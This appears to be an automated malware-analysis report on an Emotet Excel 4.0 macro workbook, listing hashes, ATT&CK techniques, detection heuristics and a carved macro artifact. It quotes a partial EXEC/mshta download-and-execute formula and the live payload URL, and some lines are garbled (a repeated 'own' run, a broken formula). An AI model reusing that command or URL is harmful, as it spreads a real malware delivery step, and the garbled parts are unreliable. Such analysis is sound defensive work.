Emotet Office (OLE) / .XLS malware analysis — malicious · 2dfd3a8503f4bb34

MALICIOUS

Office (OLE) / .XLS

90.5 KB Created: 2022-01-27 23:33:44 Authoring application: Microsoft Excel

MD5: a25ea46bcbf1c2531fd840335a4a23c9 SHA-1: 9215e7ce10bbe484ee524e5669182e271422375d SHA-256: 2dfd3a8503f4bb34c6c2c387e3429152689e138aec70f2399ca6b937e5ddc076

322 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1204.002 User Execution: Malicious File T1059.005 Command and Scripting Interpreter: Visual Basic for Applications T1204.001 User Execution: Malicious Link T1059.003 name own own own own own own own own own own own own own own own own own own own own own own own own own own own own own

The sample is an Excel 4.0 macro-enabled workbook that uses an Auto_Open entry to trigger execution. The macro in cell C3 contains the formula `EXEC("cmd /c set ooo=mshta http://91.240. RandomForest.C3,C6` is a classic Emotet delivery mechanism, which is confirmed by the ClamAV detection `Doc.Downloader.Downloader.EmotetRed02220-9938645-0`. The script's intent is to download and execute a second-stage payload from the embedded URL via mshta.exe.

Heuristics 8

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
ClamAV: Doc.Downloader.EmotetRed02220-9938645-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.EmotetRed02220-9938645-0
Reference to mshta.exe high SC_STR_MSHTA

Reference to mshta.exe
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://91.240.118.172/ee/ss/se.html

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `712daaadef5bb5a097700650c710c5cfa82b295835e03515a82f90167f9f4c8e`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	540 bytes
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.